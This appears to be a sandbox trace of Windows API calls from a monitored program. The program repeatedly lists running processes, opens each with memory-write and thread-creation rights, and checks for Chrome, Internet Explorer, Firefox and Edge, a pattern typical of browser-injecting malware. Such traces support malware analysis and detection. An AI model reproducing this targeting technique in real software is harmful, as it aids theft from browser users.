	[0227.676] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x61a4
	[0227.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.677] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.677] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.678] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.678] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x61a8
	[0227.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.679] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.680] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x61ac
	[0227.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.681] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.682] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.682] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.683] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0227.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x61b0
	[0227.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.684] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.684] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.685] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.685] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x61b4
	[0227.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.686] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.687] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.687] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.688] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0227.688] CloseHandle (hObject=0x4fd0) returned 1
	[0227.689] Sleep (dwMilliseconds=0x64) 
	[0227.792] GetCurrentProcessId () returned 0x110
	[0227.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0227.798] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0227.800] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0227.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0227.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x61b8
	[0227.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.805] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.805] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.806] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.806] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x61bc
	[0227.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.807] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.808] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.808] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.808] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0227.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x61c0
	[0227.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.809] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0227.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.810] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.810] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0227.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.810] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.811] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x61c4
	[0227.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.812] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.812] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.812] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.813] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0227.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x61c8
	[0227.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.814] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0227.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.814] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.815] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0227.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.815] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.815] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0227.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x61cc
	[0227.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.816] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0227.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.817] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.817] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0227.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.817] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.818] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0227.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x61d0
	[0227.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.819] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0227.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.819] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.819] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0227.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.819] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0227.820] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x61d4
	[0227.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.821] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.821] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.821] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.821] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x61d8
	[0227.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.822] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.827] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.827] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.828] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x61dc
	[0227.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.829] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.829] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.829] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.830] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x61e0
	[0227.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.831] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.831] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.832] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.832] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x61e4
	[0227.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.833] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.834] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.834] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.834] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x61e8
	[0227.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.835] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.836] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.836] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.837] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x61ec
	[0227.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.838] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.840] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.840] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.840] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x61f0
	[0227.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.842] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.842] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.842] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.843] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0227.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x61f4
	[0227.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.844] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0227.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.844] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.845] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0227.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.845] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x61f8
	[0227.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.846] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.846] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.847] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.847] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0227.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x61fc
	[0227.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.848] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.849] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.849] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.850] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6200
	[0227.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.851] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.851] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.851] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
